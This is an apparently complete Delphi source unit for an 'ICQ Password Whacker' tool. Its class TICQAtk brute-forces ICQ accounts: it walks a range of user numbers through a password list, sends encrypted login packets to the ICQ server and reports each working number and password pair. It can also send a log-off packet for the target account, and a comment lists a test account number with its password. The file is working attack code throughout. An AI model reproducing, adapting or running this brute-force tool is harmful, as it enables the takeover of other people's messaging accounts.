unit ICQAtk;
(***********************************************************)
(*   TICQAtk, v. 03
(*   Main object which does password whack.
(*   ---
(*
(*   Written by Coban(alex@ritlabs.com), special for using
(*   in ICQ Password Whacker app.
(**********)
interface
uses
  ICQPkt,
  ICQSock,
  ICQCrypt,
  Classes,
  WinSock,
  SysUtils,
  Dialogs;

const
  UDP_REMOTE_PORT = 4000;
  UDP_REMOTE_HOST = 'icq.mirabilis.com';
  UDP_PORT_START = 1350;
  UDP_PORT_DELTA = 1000;
  ICQ_SRV_ACK = $000A;
  ICQ_SRV_LOGIN = $E803;
  ICQ_SRV_LOGIN_REPLY = $005A;
  ICQ_SRV_SEND_TEXT = $3804;
  ICQ_MAX_BUF = 450;
  DEFAULT_RETRIES = 1;

type
  TOnErrorProc = procedure(ErrorStr: String; ErrorNo: Integer) of object;
  TOnSuccessProc = procedure(ICQ_UIN: LongWord; ICQ_PASS: String) of object;
  TOnStatusProc = procedure(StatStr: String; StatNo: Integer; UIN: LongWord; Pass: String; LPort: Integer; Thread: Byte) of object;

  TICQAtk = class
  protected
    procedure BuildLoginPacket(UIN: LongWord; pass: String; var buf: array of Byte; var buf_len: Integer; _FICQ_SEQ1: Word; _FICQ_SEQ2: Word);
    procedure BuildDisconnectPacket(UIN: LongWord; var buf: array of Byte; var buf_len: Integer; _FICQ_SEQ1: Word; _FICQ_SEQ2: Word);
    procedure OnSockError(ErrorStr: String; ErrorNo: Integer);
    procedure OnSockReceive(var Buf: array of Byte; BufLen: Integer);
    procedure OnSockTimeout;
    procedure OnAckTimeout;
    procedure IncPR(var P: Word; var R: LongWord);
    procedure CallStat(const cmd: Word);
  private
    FOnError: TOnErrorProc;                // OnError Proc
    FOnSuccess: TOnSuccessProc;            // OnSuccess Proc
    FOnStatus: TOnStatusProc;              // OnStatus Proc
    FGotAck: Boolean;                      // Ack Timeout
    FTimeout: Integer;                     // Timeout
    FAckTimeout: Integer;                  // Ack Timeout
    FLPort: Integer;                       // Local port
    FSessid: LongWord;                     // ICQ Session ID
    FRangeStart: LongWord;                 // UIN Range Start
    FRangeEnd: LongWord;                   // UIN Range End
    FPasswords: TStringList;               // Passwords
    FPassNo: Word;                         // Password pos
    FRetries: Byte;                        // Num of retries
    FICQ_SOCK_FLAG: Boolean;               // Flag (first packet)
    ICQ_SOCK: TICQSock;                    // ICQ_SOCK
    FICQ_SEQ1: Word;                       // ICQ Seq. Number 1
    FICQ_SEQ2: Word;                       // ICQ Seq. Number 2
    FDoAtk: Boolean;                       // DoAtk (false on errors)
    FDoSmart: Boolean;                     // Use ack timeout (faster)
    FDoLogOff: Boolean;                    // Log Off before login, helps in some clauses
    FLAddr: LongInt;                       // Local address (inet_addr func)
    FThread: Byte;                         // Thread ID, transparent variable
    FRetDone: Byte;
    function CheckRanges: Boolean;
    procedure DeBind;
  public
    procedure Reset(UIN: LongWord);
    procedure StartAtk;
    constructor Create(UIN_RS, UIN_RE: LongWord; PASS_L: String; Timeout: Integer; Thread: Byte; UseLogOff: Boolean = False; UseSmart: Boolean = False; AckTimeout: Integer = 0; retries: Byte = DEFAULT_RETRIES);
    destructor Destroy; override;
  published
    property OnError       : TOnErrorProc Read FOnError Write FOnError;
    property OnSuccess     : TOnSuccessProc Read FOnSuccess Write FOnSuccess;
    property OnStatus      : TOnStatusProc Read FOnStatus Write FOnStatus;
  end;

implementation
  constructor TICQAtk.Create(UIN_RS, UIN_RE: LongWord; PASS_L: String; Timeout: Integer; Thread: Byte; UseLogOff: Boolean = False; UseSmart: Boolean = False; AckTimeout: Integer = 0; retries: Byte = DEFAULT_RETRIES);
  begin
    FPasswords := TStringList.Create;
    FPasswords.Text := PASS_L;
    if retries > 0 then
      FRetries := retries
    else
      FRetries := 0;
    FRetDone := 1;
    FICQ_SOCK_FLAG := False;
    FDoAtk := True;
    FTimeout := Timeout;
    FRangeStart := UIN_RS;
    FRangeEnd := UIN_RE;
    FPassNo := 0;
    FDoSmart := False;
    FDoSmart := UseSmart;
    FLAddr := inet_addr(PChar('127.0.0.1'));
    FGotAck := False;
    FThread := Thread;
    if FDoSmart then
    begin
      FAckTimeout := AckTimeout;
      FDoLogOff := UseLogOff;
    end
    else
    begin
      FAckTimeout := 0;
      FDoLogOff := False;
    end;
      FLPort := UDP_PORT_START + Random(UDP_PORT_DELTA);
      FSessid := Random(High(LongWord));
  end;

  procedure TICQAtk.Reset(UIN: LongWord);
  begin
    FDoAtk := True;
    FRangeStart := UIN;
    FRangeEnd := UIN;
    FPassNo := 0;
    FRetDone := 1;
    StartAtk;
  end;

  procedure TICQAtk.DeBind;
  begin
    FLPort := UDP_PORT_START + Random(UDP_PORT_DELTA);
    ICQ_SOCK.Free;
    FICQ_SOCK_FLAG := False;
    ICQ_SOCK := nil;    
    StartAtk;
  end;

  destructor TICQAtk.Destroy;
  begin
    if FICQ_SOCK_FLAG then
      ICQ_SOCK.Free;
    if FPasswords <> nil then
      FPasswords.Free;
    inherited Destroy;
  end;

  function TICQAtk.CheckRanges;
  begin
    Result := True;
    if FPassNo + 1 > FPasswords.Count then
      Result := False;
    if FRangeStart > FRangeEnd then
      Result := False;
  end;

  procedure TICQAtk.IncPR(var P: Word; var R: LongWord);
  begin
    if FPasswords.Count < P + 2 then
    begin
      P := 0;
      R := R + 1;
    end
    else
      P := P + 1;
  end;

  procedure TICQAtk.StartAtk;
  var
    buf: array[0..ICQ_MAX_BUF] of Byte;
    buf_len: Integer;
  begin
    FICQ_SEQ1 := $0100;
    FICQ_SEQ2 := $0100;
    if FRetDone = FRetries then
    begin
      FLPort := UDP_PORT_START + Random(UDP_PORT_DELTA);
      FSessid := Random(High(LongWord));
      if FICQ_SOCK_FLAG then
        IncPR(FPassNo, FRangeStart);
      FRetDone := 1;
    end
    else if FICQ_SOCK_FLAG then
      Inc(FRetDone);
    if not CheckRanges then
    begin
      if FPasswords.Count < FPassNo then
        FDoAtk := False;
      FDoAtk := False;
      FICQ_SOCK_FLAG := False;
      ICQ_SOCK.Free;
    end;
    if (not FICQ_SOCK_FLAG) and (FDoAtk) then
    begin
      //at first run
      FICQ_SOCK_FLAG := True;
      ICQ_SOCK := TICQSock.Create(FLPort, UDP_REMOTE_PORT, UDP_REMOTE_HOST);
      ICQ_SOCK.OnError := OnSockError;
      ICQ_SOCK.OnReceive := OnSockReceive;
      ICQ_SOCK.OnTimeout := OnSockTimeout;
      ICQ_SOCK.OnAckTimeout := OnAckTimeout;
      if FDoLogOff then
      begin
        BuildDisconnectPacket(FRangeStart, buf, buf_len, FICQ_SEQ1, FICQ_SEQ2);
        ICQ_SOCK.Send(buf, buf_len, FTimeout, FAckTimeout);
        CallStat($0438); //sending log off packet...
      end;
      BuildLoginPacket(FRangeStart, FPasswords.Strings[FPassNo], buf, buf_len, FICQ_SEQ1, FICQ_SEQ2);
      ICQ_SOCK.Send(buf, buf_len, FTimeout, FAckTimeout);
      CallStat($03E8); //sending login packet...
      if not ICQ_SOCK.IsBinded then
        DeBind;
    end
    else if FDoAtk then
    begin
      ICQ_SOCK.ReBind(FLPort);
      //131619615; test uin (pass: 'aa');
      BuildLoginPacket(FRangeStart, FPasswords.Strings[FPassNo], buf, buf_len, FICQ_SEQ1, FICQ_SEQ2);
      ICQ_SOCK.Send(buf, buf_len, FTimeout, FAckTimeout);
      CallStat($03E8); //sending login packet...
      if not ICQ_SOCK.IsBinded then
        DeBind;
    end;
    if (not FDoAtk) then
      CallStat($0002);
  end;

  procedure TICQAtk.BuildLoginPacket(UIN: LongWord; pass: String; var buf: array of Byte; var buf_len: Integer; _FICQ_SEQ1: Word; _FICQ_SEQ2: Word);
  var
    Pkt: TICQPkt;
  begin
    Pkt := TICQPkt.Create;
    Pkt.BuildHeader(UIN, FSessid, ICQ_SRV_LOGIN, _FICQ_SEQ1, _FICQ_SEQ2); //login
    Pkt.BuildLoginPkt(FLPort, pass, Length(pass), FLAddr, FSessid);
    Pkt.GetPktByte(buf, buf_len);
    Pkt.Destroy;
    IcqEncrypt(buf, buf_len); //encrypt packet
  end;

  procedure TICQAtk.BuildDisconnectPacket(UIN: LongWord; var buf: array of Byte; var buf_len: Integer;_FICQ_SEQ1: Word; _FICQ_SEQ2: Word);
  var
    Pkt: TICQPkt;
  begin
    Pkt := TICQPkt.Create;
    Pkt.BuildHeader(UIN, FSessid, ICQ_SRV_SEND_TEXT, _FICQ_SEQ1, _FICQ_SEQ2); //send text
    Pkt.BuildDisconnectPkt();
    Pkt.GetPktByte(buf, buf_len);
    Pkt.Destroy;
    IcqEncrypt(buf, buf_len); //encrypt packet
  end;

  procedure TICQAtk.OnSockError(ErrorStr: String; ErrorNo: Integer);
  begin
    if Assigned(OnError) then
      FOnError(ErrorStr, ErrorNo);
  end;

  procedure TICQAtk.OnSockReceive(var Buf: array of Byte; BufLen: Integer);
  var
    Pkt: TICQPkt;
    icq_h: TSRV_HEADER;
  begin
    Pkt := TICQPkt.Create;
    icq_h := Pkt.ParseHeader(Buf);
    Pkt.Destroy;
    CallStat(icq_h.srv_command);
    if icq_h.srv_command = ICQ_SRV_LOGIN_REPLY then
    begin
      if Assigned(OnSuccess) then
        FOnSuccess(FRangeStart, FPasswords.Strings[FPassNo]);
      if FDoAtk then
        StartAtk;
    end;
    if icq_h.srv_command = ICQ_SRV_ACK then
      FGotAck := True;
  end;

  procedure TICQAtk.OnSockTimeout;
  begin
    CallStat($0005);
    FGotAck := False;
    if (FDoAtk) then
      StartAtk;
  end;

  procedure TICQAtk.OnAckTimeout;
  begin
    if not FGotAck then
    begin
      CallStat($0001);
      if FDoAtk then
        StartAtk;
    end;
    FGotAck := False;
  end;

  procedure TICQAtk.CallStat(const cmd: Word);
  var
    cmd_expl: String;
  begin
    case cmd of
      $0001: cmd_expl := 'Ack timeout('+IntToStr(FAckTimeout)+')';
      $0002: cmd_expl := 'Ready!';
      $0005: cmd_expl := 'Timeout('+IntToStr(FTimeout)+')';
      $03E8: cmd_expl := 'Trying login('+IntToStr(FRetDone)+')...';
      $005A: cmd_expl := 'Login OK!';
      $000A: cmd_expl := 'ACK';
      $0064: cmd_expl := 'Bad password!';
      $0438: cmd_expl := 'Logging off...';
      else
        cmd_expl := 'Unknown packet('+IntToStr(cmd)+')';
    end;
    if Assigned(OnStatus) then
      FOnStatus(cmd_expl, cmd, FRangeStart, FPasswords.Strings[FPassNo], FLport, FThread);
  end;
end.